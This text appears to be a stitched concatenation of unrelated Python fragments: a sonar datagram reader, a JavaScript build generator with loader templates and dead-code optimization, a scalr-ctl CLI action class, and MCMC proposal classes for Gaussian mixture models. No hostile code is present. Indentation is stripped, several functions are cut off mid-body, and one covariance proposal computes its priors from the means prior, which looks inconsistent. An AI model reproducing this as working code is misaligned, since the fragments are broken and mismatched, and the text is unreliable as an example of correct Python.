recs_to_read[rec][dgram] = np.concatenate(recs_to_read[rec][dgram])
else:
recs_to_read[rec][dgram] = np.array(recs_to_read[rec][dgram])
return recs_to_read
def sequential_read_records(self, start_ptr=0, end_ptr=0, first_installation_rec=False):
"""
Read the file and return a dict of the wanted records/fields according to recs_categories. If start_ptr/end_ptr
is provided, start and end at those byte offsets.
returns: recs_to_read, dict of dicts for each desired record read sequentially, see recs_categories
"""
recs_categories, recs_categories_translator, recs_categories_result = self._build_sequential_read_categories()
wanted_records = list(recs_categories.keys())
recs_to_read = copy.deepcopy(recs_categories_result)
recs_count = dict([(k, 0) for k in recs_to_read])
if self.FID is None:
self.OpenFiletoRead()
filelen = self._initialize_sequential_read(start_ptr, end_ptr)
if start_ptr:
self.seek_next_startbyte(filelen, start_ptr=start_ptr)
while not self.eof:
if self.FID.tell() >= start_ptr + filelen:
self.eof = True
break
self.decode_datagram()
if self.datagram_ident not in wanted_records:
self.skip_datagram()
continue
self.read_datagram()
for rec_ident in list(recs_categories_translator[self.datagram_ident].values())[0]:
recs_count[rec_ident[0]] += 1
rec = self.datagram_data
recs = self._divide_rec(rec) # split up the MRZ record for multiple sectors, otherwise just returns [rec]
for rec in recs:
for subrec in recs_categories[self.datagram_ident]:
# override for nested recs, designated with periods in the recs_to_read dict
if subrec.find('.') > 0:
if len(subrec.split('.')) == 3:
rec_key = subrec.split('.')[2]
tmprec = rec[subrec.split('.')[0]][subrec.split('.')[1]][rec_key]
else:
rec_key = subrec.split('.')[1]
tmprec = rec[subrec.split('.')[0]][rec_key]
else:
rec_key = subrec
tmprec = rec[rec_key]
if subrec in ['install_txt', 'runtime_txt']: # str, casting to list splits the string, dont want that
val = [tmprec]
else:
try: # flow for array/list attribute
val = [np.array(tmprec)]
except TypeError: # flow for float/int attribute
val = [tmprec]
# generate new list or append to list for each rec of that dgram type found
for translated in recs_categories_translator[self.datagram_ident][subrec]:
if recs_to_read[translated[0]][translated[1]] is None:
recs_to_read[translated[0]][translated[1]] = copy.copy(val)
else:
recs_to_read[translated[0]][translated[1]].extend(val)
if self.datagram_ident == 'IIP' and first_installation_rec:
self.eof = True
recs_to_read = self._finalize_records(recs_to_read, recs_count)
return recs_to_read
def translate_yawpitch_tostring(self, arr):
"""
Translate the binary code to a string identifier. Allows user to understand the mode
without translating the integer code in their head. Kluster will build plots using these string identifiers
in the legend.
'yawpitchstabilization' = 'Y' for Yaw stab, 'P' for pitch stab, 'PY' for both, 'N' for neither
# xxxxxxx0 no pitch stab, xxxxxxx1 | |
the JS snippet that is to be plugged into the decodeUris
# function in the loader.
def loaderDecodeUrisPlug(script, compConf):
plugCodeFile = compConf.get("code/decode-uris-plug", False)
plugCode = ""
if plugCodeFile:
plugCode = filetool.read(self._config.absPath(plugCodeFile)) # let it bomb if file can't be read
return plugCode.strip()
##
# Replace the placeholders in the loader template.
# @throw KeyError a placeholder could not be filled from <vals>
def loaderFillTemplate(vals, template):
templ = MyTemplate(template)
result = templ.substitute(vals)
return result
##
# Translate URI data to JavaScript
# using Package objects
def packageUrisToJS(packages, version):
allUris = []
for packageId, package in enumerate(packages):
package_uris = []
if package.file: # build
namespace = "__out__"
fileId = package.file
relpath = OsPath(fileId)
shortUri = Uri(relpath.toUri())
entry = "%s:%s" % (namespace, shortUri.encodedValue())
package_uris.append(entry)
package.files.append(entry) # TODO: make package.file obsolete
elif package.files: # hybrid
package_uris = package.files
else: # "source" :
for clazz in package.classes:
namespace = clazz.library.namespace
relpath = OsPath(clazz.relpath)
shortUri = Uri(relpath.toUri())
entry = "%s:%s" % (namespace, shortUri.encodedValue())
package_uris.append(entry)
package.files.append(entry) # TODO: this should done be elsewhere?!
allUris.append(package_uris)
return allUris
##
# Find and read the loader template.
def loaderTemplate(script, compConf):
templatePath = compConf.get("paths/loader-template", None)
if not templatePath:
# use default template
templatePath = os.path.join(filetool.root(), os.pardir, "data", "generator", "loader.tmpl.js")
templateCont = filetool.read(templatePath)
return templateCont, templatePath
def getPackageData(package):
data = {}
data["resources"] = package.data.resources
if not self._job.get("packages/i18n-as-parts", False):
data["translations"] = package.data.translations
data["locales"] = package.data.locales
data = json.dumpsCode(data)
data += ';\n'
return data
##
# process "statics" optimization
#
def optimizeDeadCode(classList, featureMap, compConf, treegen, log_progress):
##
# define a criterion when optimization is saturated
# (here: when nullrefs hasn't changed in 4 times)
def atLimit(featureMap, lmin=[]):
# array of (class.id, feature) the feature ref count of which is 0
nullrefs = [(cls, feat) for cls in featureMap
for feat in featureMap[cls] if not featureMap[cls][feat].hasref()]
cmin = len(nullrefs)
lmin.append(cmin)
# use the last 4 length values
if len(lmin)>3 and all([x==cmin for x in lmin[-4:]]):
return True
else:
return False
##
# print features with external usages
def debugFeatureMap(featureMap):
for key in featureMap:
print key
features = featureMap[key]
for feat in features:
ext_refs = set(["%s:%s" % (ref.requestor, ref.line) for ref in features[feat]._refs if ref.requestor != key])
print "\t", feat, ":", features[feat]._ref_cnt, "%r" % list(ext_refs)
# a class list that skips the head classes
def classlistiter():
for c in classList:
if c.id not in head_classes:
yield c
def external_use(clazz, featureMap):
ext_use = False
class_features = featureMap[clazz.id]
for feat in class_features:
if not class_features[feat].hasref():
continue
else:
external_classes = [x for x in class_features[feat]._refs if x.requestor != clazz.id]
if external_classes:
ext_use = True
break
return ext_use
def remove_class_refs(clazz, featureMap):
for key in featureMap:
for feat in featureMap[key]:
uf = featureMap[key][feat]
for ref in uf._refs[:]:
if ref.requestor == clazz.id:
uf.decref(clazz.id)
def check_reachability_graph(head_classes, featureMap, classList):
gr = graph.digraph()
[gr.add_node(s) for s in featureMap.keys()] # assert featureMap.keys() == [classList.id's]
# add "using" edges (featureMap is a used-by mapping)
for cls in featureMap:
other_using = [dep.name for x in featureMap for y in featureMap[x] for dep in featureMap[x][y]._refs if dep.requestor==cls and dep.name!=cls]
for other in other_using:
gr.add_edge(cls, other)
log_progress()
access_matrix = gr.accessibility()
reachable_nodes = set()
for head_class in head_classes:
reachable_nodes.update(access_matrix[head_class])
# purge unreachable nodes
for cls in classList[:]:
if cls.id not in reachable_nodes:
classList.remove(cls)
#self._console.info("removing %s" % cls.id)
log_progress()
# ------------------------------------------------------------
# collect all head classes, so they are not removed
head_classes = []
[head_classes.extend(x.initial_deps) for x in script.parts.values()]
# seed Class._tmp_tree with the right tree
for clazz in classList:
log_progress()
clazz._tmp_tree = clazz.tree(treegen)
if "variants" in compConf.optimize:
clazz._tmp_tree = clazz.optimize(None, ["variants"], compConf.variantset) # using None allows us to re-used a cached tree
# then, prune as long as we have ref counts == 0 on features
while True:
# break the loop if we are not making any more progress ("fixed point")
if atLimit(featureMap):
break
# (a) first, let clazz.optimize remove those features
for clazz in classlistiter():
clazz._tmp_tree = clazz.optimize(clazz._tmp_tree, ["statics"], featureMap=featureMap)
log_progress()
# (b) then, remove entire unused classes from classlist
for clazz in classlistiter():
if clazz.id in featureMap:
if (not featureMap[clazz.id] # no feature is used
or not external_use(clazz, featureMap) # features only used by the class itself
):
classList.remove(clazz)
del featureMap[clazz.id]
remove_class_refs(clazz, featureMap) # remove all the class's UsedFeature entries as well
log_progress()
#self._console.info("removing %s" % clazz.id)
# removing entire classes might remove dependencies of construct, defer, extend, etc,
# so this might have again zero'ed usage counts of remaining features, so we have to loop
# Lastly, when we cannot reduce anymore by looking at feature usage,
# check reachability graph of head classes
check_reachability_graph(head_classes, featureMap, classList)
# debug hook
if 0: debugFeatureMap(featureMap)
# logging
self._console.dotclear()
self._console.indent()
for cls in classList:
self._console.info(cls.id)
self._console.info("Number of classes after static optimization: %d" % len(classList))
for clazz in featureMap:
self._console.debug("'%s': used features: %r" % (clazz, featureMap[clazz].keys()))
self._console.outdent()
return classList
##
# If variants optimization is done and environment/qx.AllowUrlSettings:true,
# overriding other config env keys with URL parameters will not work, as the corresponding
# calls in the code are optimized away.
def warn_if_qxAllowUrlSettings(jobObj, compConf):
env = jobObj.get("environment", {})
qxAllowUrlSettings = bool(env.get("qx.allowUrlSettings", False))
optimizeVariants = "variants" in compConf.optimize
dont_warn_this = "variants-and-url-settings" in jobObj.get("config-warnings/environment", [])
if qxAllowUrlSettings and optimizeVariants and not dont_warn_this:
self._console.warn(
"Doing variants optimization with qx.allowUrlSettings:true is partly contradictory! " +
"You will not be able to URL-override these environment keys:\n%s" % sorted(env.keys())
)
def compileClasses(classList, compConf, log_progress=lambda:None):
result = []
# warn qx.allowUrlSettings - variants optim. conflict (bug#6141)
if "variants" in compConf.optimize:
warn_if_qxAllowUrlSettings(self._job, compConf)
# do "statics" optimization out of line
if "statics" in compConf.optimize:
tmp_optimize = compConf.optimize[:]
#classList = optimizeDeadCode(classList, script._featureMap, compConf, treegen=treegenerator, log_progress=log_progress)
tmp_optimize.remove("statics")
if "variants" in tmp_optimize:
tmp_optimize.remove("variants") # has been done in optimizeDeadCode
# do the rest
for clazz in classList:
tree = clazz.optimize(clazz._tmp_tree, tmp_optimize)
code = clazz.serializeTree(tree, tmp_optimize, compConf.format)
result.append(code)
log_progress()
result = u''.join(result)
# no 'statics' optimization
else:
for clazz in classList:
code = clazz.getCode(compConf, treegen=treegenerator, featuremap=script._featureMap) # choose parser frontend
result.append(code)
log_progress()
result = u''.join(result)
return result
##
# helper log function, to log progress here, but also in compileClasses()
def log_progress(c=[0]):
c[0]+=1
self._console.dot()
##
# Go through a set of classes, and either compile some of them into
# a common .js file, constructing the URI to this file, or just construct
# the URI to the source file directly if the class matches a filter.
# Return the list of constructed URIs.
def compileAndWritePackage(package, compConf, allClassVariants, per_file_prefix):
def compileAndAdd(compiled_classes, package_uris, prelude='', wrap=''):
compiled = compileClasses(compiled_classes, compOptions, log_progress)
if wrap:
compiled = wrap % compiled
if prelude:
compiled = prelude + compiled
filename = self._computeFilePath(script, sha.getHash(compiled)[:12])
self.writePackage(compiled, filename, script)
filename = OsPath(os.path.basename(filename))
shortUri = Uri(filename.toUri())
entry = "%s:%s" % ("__out__", shortUri.encodedValue())
package_uris.append(entry)
return package_uris
##
# Write the package data and the compiled class code in so many
# .js files, skipping source files.
def write_uris(package_data, package_classes, per_file_prefix):
sourceFilter = ClassMatchList(compConf.get("code/except", []))
compiled_classes = [] # to accumulate classes that are compiled and can go into one .js file
package_uris = [] # the uri's of the .js files of this package
for pos,clazz in enumerate(package_classes):
# class is taken from the source file
if sourceFilter.match(clazz.id):
package.has_source = True # indicate that this package has source files
# before processing the source class, cat together data and accumulated classes, if any
if package_data or compiled_classes:
if per_file_prefix:
package_data = per_file_prefix + package_data
# treat compiled classes so far
package_uris = compileAndAdd(compiled_classes, package_uris, package_data)
compiled_classes = [] # reset the collection
package_data = ""
# now, for a source class, just include the file uri
clazzRelpath = clazz.id.replace(".", "/") + ".js"
relpath = OsPath(clazzRelpath)
shortUri = Uri(relpath.toUri())
entry = "%s:%s" % (clazz.library.namespace, shortUri.encodedValue())
package_uris.append(entry)
log_progress()
# register it to be lumped together with other classes
else:
compiled_classes.append(clazz)
# finally, treat remaining to be concat'ed classes
else:
if compiled_classes:
closureWrap = ''
if isClosurePackage(package, bootPackageId(script)):
closureWrap = u'''qx.Part.$$notifyLoad("%s", function() {\n%%s\n});''' % package.id
if per_file_prefix:
| |
# -*- coding: utf-8 -*-
import json
import re
import os
import time
import dicttoxml
from scalrctl import click, request, settings, utils, view, examples, defaults
__author__ = '<NAME>'
class MultipleClickException(click.ClickException):
def format_message(self):
return '\x1b[31m%s\x1b[39m' % self.message if settings.colored_output else self.message
def show(self, file=None):
if file is None:
file = click._compat.get_text_stderr()
click.utils.echo('%s' % self.format_message(), file=file)
class BaseAction(object):
epilog = None
def __init__(self, *args, **kwargs):
pass
def run(self, *args, **kwargs):
pass
def get_description(self):
return ''
def modify_options(self, options):
return options
def get_options(self):
return []
def validate(self):
pass
class Action(BaseAction):
raw_spec = None
# Optional. Some values like GCE imageId
# cannot be passed through command lines
prompt_for = None
# Temporary. Object definitions in YAML
# spec are not always correct
mutable_body_parts = None
# Optional, e.g. '#/definitions/GlobalVariable'
object_reference = None
dry_run = False
post_template = None
_table_columns = []
_discriminators = {}
ignored_options = ()
delete_target = None
def __init__(self, name, route, http_method, api_level, *args, **kwargs):
self.name = name
self.route = route
self.http_method = http_method
self.api_level = api_level
self.strip_metadata = False
self._init()
def _init(self):
self.raw_spec = utils.read_spec(self.api_level, ext='json')
if not self.epilog and self.http_method.upper() == 'POST':
msg = "Example: scalr-ctl {level} {name} < {name}.json"
self.epilog = msg.format(
level=self.api_level if self.api_level != 'user' else '',
name=self.name
)
def _check_arguments(self, **kwargs):
route_data = self.raw_spec['paths'][self.route]
if 'parameters' not in route_data:
return
for param in route_data['parameters']:
pattern = param.get('pattern')
param_name = param.get('name')
if pattern and param_name and param_name in kwargs:
value = str(kwargs.get(param_name, '')).strip()
matches = re.match(pattern, value)
if not matches:
matches = re.search(pattern, value, re.MULTILINE)
if not matches or len(matches.group()) != len(value):
raise click.ClickException("Invalid value for {}"
.format(param_name))
def _apply_arguments(self, **kwargs):
if kwargs.get('filters'):
for pair in kwargs.pop('filters').split(','):
kv = pair.split('=')
if len(kv) == 2:
kwargs[kv[0]] = kv[1]
if kwargs.get('columns'):
self._table_columns = kwargs.pop('columns').split(',')
if kwargs.pop('strip_metadata', False):
self.strip_metadata = True
if kwargs.pop('dryrun', False):
self.dry_run = True
if kwargs.pop('debug', None):
settings.debug_mode = True
if kwargs.pop('nocolor', None):
settings.colored_output = False
if kwargs.get('transformation'):
settings.view = kwargs.pop('transformation')
return kwargs
def _get_object(self, *args, **kwargs):
try:
obj = self.__class__(name='get', route=self.route,
http_method='get', api_level=self.api_level)
raw_text = obj.run(*args, **kwargs)
utils.debug(raw_text)
if raw_text is None:
return {}
json_text = json.loads(raw_text)
filtered = self._filter_json_object(json_text['data'],
filter_createonly=True)
return json.dumps(filtered, indent=2)
except Exception as e:
utils.reraise(e)
def _edit_object(self, *args, **kwargs):
raw_object = self._get_object(*args, **kwargs)
raw_object = click.edit(raw_object)
if raw_object is None:
raise ValueError("No changes in JSON")
return json.loads(raw_object)
def _edit_example(self):
commentary = examples.create_post_example(self.api_level, self.route)
text = click.edit(commentary)
if text:
raw_object = "".join([line for line in text.splitlines()
if not line.startswith("#")]).strip()
else:
raw_object = ""
return json.loads(raw_object)
@staticmethod
def _read_object():
"""
Reads JSON object from stdin.
"""
raw_object = click.get_text_stream('stdin').read()
return json.loads(raw_object)
def _format_errmsg(self, errors):
messages = []
num = 1
for error_data in errors:
err_code = '%s:' % error_data['code'] if 'code' in error_data else ''
err_msg = error_data.get('message', '')
err_index = ':' if len(errors) == 1 else ' %s:' % num
err_line = 'Error%s %s %s' % (err_index, err_code, err_msg)
messages.append(err_line)
num += 1
result_errmsg = '\n'.join(messages)
return result_errmsg
def _format_response(self, response, hidden=False, **kwargs):
text = None
if response:
try:
response_json = json.loads(response)
except ValueError:
utils.debug("Server response: {}".format(str(response)))
utils.reraise("Invalid server response")
errors = response_json.get('errors')
warnings = response_json.get('warnings') # type: list[dict]
if warnings:
utils.warning(*warnings)
if errors:
errmsg = self._format_errmsg(errors)
error = MultipleClickException(errmsg)
error.code = 1
raise error
if not hidden:
utils.debug(response_json.get('meta'))
if self.strip_metadata and self.http_method.upper() == 'GET' and \
settings.view in ('raw', 'json', 'xml') and 'data' in response_json: # SCALRCORE-10392
response_json = response_json['data']
response = json.dumps(response_json)
if hidden:
pass
elif settings.view in ('raw', 'json'):
click.echo(response)
elif settings.view == 'xml':
click.echo(dicttoxml.dicttoxml(response_json))
elif settings.view == 'tree':
data = json.dumps(response_json.get('data'))
click.echo(view.build_tree(data))
elif settings.view == 'table':
columns = self._table_columns or self._get_column_names()
if self._returns_iterable():
rows, current_page, last_page = view.calc_vertical_table(response_json,
columns)
pre = "Page: {} of {}".format(current_page, last_page)
click.echo(view.build_vertical_table(columns, rows, pre=pre)) # XXX
else:
click.echo(view.build_horizontal_table(
view.calc_horizontal_table(response_json, columns)))
elif self.http_method.upper() == 'DELETE':
deleted_id = kwargs.get(self.delete_target, '') or ''
if not deleted_id:
for param, value in kwargs.items():
if 'Id' in param and param not in ('envId', 'accountId'):
deleted_id = value
break
if not deleted_id:
for param, value in kwargs.items():
if 'Name' in param:
deleted_id = value
break
text = "Deleted {}".format(deleted_id)
return text
def _get_default_options(self):
options = []
for param in self._get_raw_params():
option = click.Option(('--{}'.format(param['name']),
param['name']), required=param['required'],
help=param['description'],
default=param.get('default'),
show_default='default' in param)
options.append(option)
return options
def _get_custom_options(self):
options = []
if self.http_method.upper() in ('POST', 'PATCH'):
stdin = click.Option(('--stdin', 'stdin'),
is_flag=True, required=False,
help="Read JSON data from standart console "
"input instead of editing it in the "
"default console text editor.")
options.append(stdin)
"""
interactive = click.Option(('--interactive', 'interactive'),
is_flag=True, required=False,
help="Edit JSON data in the default "
"console text editor before "
"sending POST request to server.")
options.append(interactive)
"""
if self.http_method.upper() == 'GET':
if self._returns_iterable():
maxres = click.Option(('--max-results', 'maxResults'),
type=int, required=False,
help="Maximum number of records. "
"Example: --max-results=2")
options.append(maxres)
pagenum = click.Option(('--page-number', 'pageNum'), type=int,
required=False, help="Current page "
"number. Example: --page-number=3")
options.append(pagenum)
filters = self._get_available_filters()
if filters:
filters = sorted(filters)
filter_help = ("Apply filters. Example: type=ebs,size=8."
"Available filters: {}."
).format(', '.join(filters))
filters = click.Option(('--filters', 'filters'),
required=False, help=filter_help)
options.append(filters)
columns_help = ("Filter columns in table view "
"[--table required]. Example: NAME,SIZE,"
"SCOPE. Available columns: {}."
).format(', '.join(self._get_column_names()))
columns = click.Option(('--columns', 'columns'),
required=False, help=columns_help)
options.append(columns)
raw = click.Option(('--raw', 'transformation'), is_flag=True,
flag_value='raw', default=False, hidden=True,
help="Print raw response")
json_ = click.Option(('--json', 'transformation'), is_flag=True,
flag_value='raw', default=False,
help="Print raw response")
strip_metadata = click.Option(('--no-envelope', 'strip_metadata'), is_flag=True, default=False,
help="Strip server response from all metadata.")
xml = click.Option(('--xml', 'transformation'), is_flag=True,
flag_value='xml', default=False,
help="Print response as a XML")
tree = click.Option(('--tree', 'transformation'), is_flag=True,
flag_value='tree', default=False,
help="Print response as a colored tree")
nocolor = click.Option(('--nocolor', 'nocolor'), is_flag=True,
default=False, help="Use colors")
options += [raw, tree, nocolor, json_, xml, strip_metadata]
if self.name not in ('get', 'retrieve'): # [ST-54] [ST-102]
table = click.Option(('--table', 'transformation'),
is_flag=True, flag_value='table',
default=False,
help="Print response as a colored table")
options.append(table)
debug = click.Option(('--debug', 'debug'), is_flag=True,
default=False, help="Print debug messages")
options.append(debug)
return options
def _get_body_type_params(self):
route_data = self.raw_spec['paths'][self.route][self.http_method]
return [param for param in route_data.get('parameters', '')]
def _get_path_type_params(self):
route_data = self.raw_spec['paths'][self.route]
return [param for param in route_data.get('parameters', '')]
def _get_raw_params(self):
result = self._get_path_type_params()
if self.http_method.upper() in ('GET', 'DELETE'):
body_params = self._get_body_type_params()
result.extend(body_params)
return result
def _returns_iterable(self):
responses = self.raw_spec['paths'][self.route][self.http_method]['responses']
if '200' in responses:
response_200 = responses['200']
if 'schema' in response_200:
schema = response_200['schema']
if '$ref' in schema:
object_key = schema['$ref'].split('/')[-1]
object_descr = self.raw_spec['definitions'][object_key]
object_properties = object_descr['properties']
data_structure = object_properties['data']
return 'array' == data_structure.get('type')
return False
def _get_available_filters(self):
if self._returns_iterable():
data = self._result_descr['properties']['data']
response_ref = data['items']['$ref']
response_descr = self._lookup(response_ref)
if 'x-filterable' in response_descr:
return response_descr['x-filterable']
return []
def _get_column_names(self):
data = self._result_descr['properties']['data']
# XXX: Inconsistency in swagger spec.
# See RoleDetailsResponse vs RoleCategoryListResponse
response_ref = data['items']['$ref'] \
if 'items' in data else data['$ref']
response_descr = self._lookup(response_ref)
properties = response_descr['properties']
column_names = []
for k, v in properties.items():
if '$ref' not in v:
column_names.append(k)
else: # ST-226
f_key = self._lookup(v['$ref'])
if "properties" in f_key:
if len(f_key["properties"]) == 1:
if "id" in f_key["properties"]:
if "type" in f_key["properties"]["id"]:
if f_key["properties"]["id"]["type"] in ("integer", "string"):
column_names.append("%s.id" % k)
return column_names
def _lookup(self, response_ref):
"""
Returns document section
Example: #/definitions/Image returns Image defenition section.
"""
if response_ref.startswith('#'):
paths = response_ref.split('/')[1:]
result = self.raw_spec
for path in paths:
if path not in result:
return
result = result[path]
return result
@property
def _result_descr(self):
route_data = self.raw_spec['paths'][self.route]
if self.http_method == 'post':
data_block = route_data.get('get', route_data['post']) # XXX: non-CRUD actions e.g. farm launch
else:
data_block = route_data[self.http_method]
responses = data_block['responses']
if '200' in responses:
response_200 = responses['200']
if 'schema' in response_200:
schema = response_200['schema']
if '$ref' in schema:
response_ref = schema['$ref']
return self._lookup(response_ref)
def _list_concrete_types(self, schema):
types = []
if "x-concreteTypes" in schema:
for ref_dict in schema["x-concreteTypes"]:
ref_link = ref_dict['$ref']
types += [link.split("/")[-1] for link in self._list_concrete_types_recursive(ref_link)]
return types
def _list_concrete_types_recursive(self, reference):
references = []
schema = self._lookup(reference)
if "x-concreteTypes" not in schema:
references.append(reference)
else:
for ref_dict in schema["x-concreteTypes"]:
references += self._list_concrete_types_recursive(ref_dict['$ref'])
return references
def _filter_json_object(self, data, filter_createonly=False,
schema=None, reference=None):
"""
Removes immutable parts from JSON object
before sending it in POST or PATCH.
"""
filtered = {}
# load `schema`
if schema is None:
for | |
import numpy as np
from gmmmc.gmm import GMM
from gmmmc.proposals.proposals import Proposal
import pdb
import logging
class GaussianStepMeansProposal(Proposal):
"""Gaussian Proposal distribution for means of a GMM"""
def __init__(self, step_sizes=(0.001,)):
"""
Gaussian proposal distribution for the means. The multivariate Gaussian is centered at the means of the current
state in the Markov Chain and has covariance given by step_sizes. Multiple step sizes can be specified.
The proposal algorithm will take these steps in the sequence specified in step_sizes.
Parameters
----------
step_sizes : 1-D array_like
Iterable containing the sequence of step sizes (covariances of the Gaussian proposal distribution"
"""
super(GaussianStepMeansProposal, self).__init__()
self.step_sizes = step_sizes
self.count_accepted = np.zeros((len(step_sizes),))
self.count_illegal = np.zeros((len(step_sizes),))
self.count_proposed = np.zeros((len(step_sizes),))
def propose(self, X, gmm, target, n_jobs=1):
"""
Propose a new set of GMM means.
Parameters
----------
X : 2-D array like of shape (n_samples, n_features)
The observed data or evidence.
gmm : GMM object
The current state (set of gmm parameters) in the Markov Chain
target : GMMPosteriorTarget object
The target distribution to be found.
n_jobs : int
Number of cpu cores to use in the calculation of log probabilities.
Returns
-------
: GMM
A new GMM object initialised with new mean parameters.
"""
new_means = np.array(gmm.means)
beta = target.beta
prior = target.prior
steps = [np.random.multivariate_normal(np.zeros(gmm.n_features),
step_size * np.eye(gmm.n_features),
size=gmm.n_mixtures)
for step_size in self.step_sizes]
# calculation of prior probabilities of only the means, since only means will change
log_priors = np.array([prior.means_prior.log_prob_single(gmm.means[mixture], mixture) for mixture in xrange(gmm.n_mixtures)])
log_prob_priors = np.sum(log_priors)
previous_prob = beta * gmm.log_likelihood(X, n_jobs) + np.sum(log_priors)
for i, step in enumerate(steps):
for mixture in xrange(gmm.n_mixtures):
self.count_proposed[i] += 1
# propose new means
new_mixture_means = gmm.means[mixture] + step[mixture]
# try out the new means
proposed_means = np.array(new_means)
proposed_means[mixture] = new_mixture_means
proposed_gmm = GMM(proposed_means, np.array(gmm.covars), np.array(gmm.weights))
# calculate new prior
new_log_prob_mixture = prior.means_prior.log_prob_single(new_mixture_means, mixture)
new_log_prob_priors = log_prob_priors - log_priors[mixture] + new_log_prob_mixture
# priors
proposed_prob = beta * proposed_gmm.log_likelihood(X, n_jobs) + new_log_prob_priors
# ratio
ratio = proposed_prob - previous_prob
if ratio > 0 or ratio > np.log(np.random.uniform()):
# accept proposal
new_means = proposed_means
previous_prob = proposed_prob
# update prior probability calculation
log_prob_priors = new_log_prob_priors
log_priors[mixture] = new_log_prob_mixture
self.count_accepted[i] += 1
return GMM(new_means, np.array(gmm.covars), np.array(gmm.weights))
class GaussianStepCovarProposal(Proposal):
def __init__(self, step_sizes=(0.001,)):
"""
Gaussian proposal function for the covariances of the GMM.
Parameters
----------
step_sizes : array_like
Array of covariance values for the Gaussian proposal.
"""
super(GaussianStepCovarProposal, self).__init__()
self.step_sizes = step_sizes
self.count_accepted = np.zeros((len(step_sizes),))
self.count_illegal = np.zeros((len(step_sizes),))
self.count_proposed = np.zeros((len(step_sizes),))
def propose(self, X, gmm, target, n_jobs=1):
"""
Propose a new set of GMM covariances (diagonal only).
Parameters
----------
X : 2-D array like of shape (n_samples, n_features)
The observed data or evidence.
gmm : GMM object
The current state (set of gmm parameters) in the Markov Chain
target : GMMPosteriorTarget object
The target distribution to be found.
n_jobs : int
Number of cpu cores to use in the calculation of log probabilities.
Returns
-------
: GMM
A new GMM object initialised with new covariance parameters.
"""
new_covars = np.array(gmm.covars)
beta = target.beta
prior = target.prior
previous_prob = beta * gmm.log_likelihood(X, n_jobs) + prior.log_prob(gmm)
steps = [np.random.multivariate_normal(np.zeros(gmm.n_features),
step_size * np.eye(gmm.n_features),
size=gmm.n_mixtures) for step_size in self.step_sizes]
log_priors = np.array([prior.means_prior.log_prob_single(gmm.means[mixture], mixture) for mixture in xrange(gmm.n_mixtures)])
log_prob_priors = np.sum(log_priors)
for i, step in enumerate(steps):
for mixture in xrange(gmm.n_mixtures):
self.count_proposed[i] += 1
# propose new covars
new_mixture_covars = gmm.covars[mixture] + step[mixture]
if (new_mixture_covars > 0).all(): # check covariances are valid
# try out the new covars
proposed_covars = np.array(new_covars)
proposed_covars[mixture] = new_mixture_covars
proposed_gmm = GMM(np.array(gmm.means), proposed_covars, np.array(gmm.weights))
# calculate desired distribution
new_log_prob_mixture = prior.covars_prior.log_prob_single(new_mixture_covars, mixture)
new_log_prob_priors = log_prob_priors - log_priors[mixture] + new_log_prob_mixture
proposed_prob = beta * proposed_gmm.log_likelihood(X, n_jobs) + new_log_prob_priors
# ratio
ratio = proposed_prob - previous_prob
if ratio > 0 or ratio > np.log(np.random.uniform()):
# accept proposal
new_covars = proposed_covars
previous_prob = proposed_prob
log_prob_priors = new_log_prob_priors
log_priors[mixture] = new_log_prob_mixture
self.count_accepted[i] += 1
else:
self.count_illegal[i] += 1
return GMM(np.array(gmm.means), np.array(new_covars), np.array(gmm.weights))
class GaussianStepWeightsProposal(Proposal):
def __init__(self, n_mixtures, step_sizes=(0.001,), threshold=0.001):
"""
Gaussian proposal function for the weights of a GMM.
Parameters
----------
n_mixtures
step_sizes
Notes
----------
The proposal function works by projecting the weight vector w onto the simplex defined by
w_1 + w_2 + ..... w_n = 1 , 0<=w_i<=1. The change of basis matrix is found by finding n-1 vectors lying on the plane
and using gramm schmidt to get an orthonormal basis. A Gaussian proposal function in (n-1)-d space is
used to find the next point on the simplex.
"""
super(GaussianStepWeightsProposal, self).__init__()
self.step_sizes = step_sizes
self.n_mixtures = n_mixtures
self.count_accepted = np.zeros((len(step_sizes),))
self.count_illegal = np.zeros((len(step_sizes),))
self.count_proposed = np.zeros((len(step_sizes),))
self.threshold = threshold
if n_mixtures > 1:
# get change of basis matrix mapping n dim coodinates to n-1 dim coordinates on simplex
# x1 + x2 + x3 ..... =1
points = np.random.dirichlet([1 for i in xrange(n_mixtures)], size=n_mixtures - 1)
points = points.T
self.plane_origin = np.ones((n_mixtures)) / float(n_mixtures)
# get vectors parallel to plane from its center (1/n,1/n,....)
parallel = points - np.ones(points.shape) / float(n_mixtures)
# do gramm schmidt to get mutually orthonormal vectors (basis)
self.e, _ = np.linalg.qr(parallel)
def transformSimplex(self, weights):
"""
Project weight vector onto the normal simplex.
Parameters
----------
weights : array_like of shape (n_mixtures,)
vector of weights for each gaussian component
Returns
-------
: array_like of shape (n_mixtures-1,)
vector of weights projected onto the simplex plane
"""
# project onto the simplex
return np.dot(self.e.T, weights - self.plane_origin)
def invTransformSimplex(self, simplex_coords):
"""
Transforms a point on the simplex to the original vector space.
Parameters
----------
simplex_coords : array_like of shape (n_mixtures - 1,)
Coordinates of a weight vector on the simplex.
Returns
-------
: array_like of shape(n_mixtures,)
vector of weights.
"""
return self.plane_origin + np.dot(self.e, simplex_coords)
def propose(self, X, gmm, target, n_jobs=1):
"""
Propose a new set of weight vectors.
Parameters
----------
X : 2-D array like of shape (n_samples, n_features)
The observed data or evidence.
gmm : GMM object
The current state (set of gmm parameters) in the Markov Chain
target : GMMPosteriorTarget object
The target distribution to be found.
n_jobs : int
Number of cpu cores to use in the calculation of log probabilities.
Returns
-------
: GMM
A new GMM object initialised with new covariance parameters.
"""
accepted = False
cur_gmm = gmm
if gmm.n_mixtures > 1:
for i, step_size in enumerate(self.step_sizes):
self.count_proposed[i] += 1
current_weights_transformed = self.transformSimplex(cur_gmm.weights)
proposed_weights_transformed = np.random.multivariate_normal(current_weights_transformed,
np.eye(self.n_mixtures - 1) * step_size)
proposed_weights = self.invTransformSimplex(proposed_weights_transformed)
if np.logical_and(0 <= proposed_weights, proposed_weights <= 1).all()\
and np.isclose(np.sum(proposed_weights), 1.0) and (proposed_weights>self.threshold).all():
previous_prob = target.log_prob(X, cur_gmm, n_jobs)
proposed_gmm = GMM(np.array(cur_gmm.means), np.array(cur_gmm.covars), proposed_weights)
proposed_prob = target.log_prob(X, proposed_gmm, n_jobs)
ratio = proposed_prob - previous_prob
if ratio > 0 or ratio > np.log(np.random.uniform()):
# accept proposal
self.count_accepted[i] += 1
accepted = True
cur_gmm = proposed_gmm
else:
self.count_illegal[i] += 1
if accepted is True:
return cur_gmm
else:
return GMM(np.array(gmm.means), np.array(gmm.covars), np.array(gmm.weights))
class GaussianTuningStepMeansProposal(Proposal):
"""Gaussian Proposal distribution for means of a GMM"""
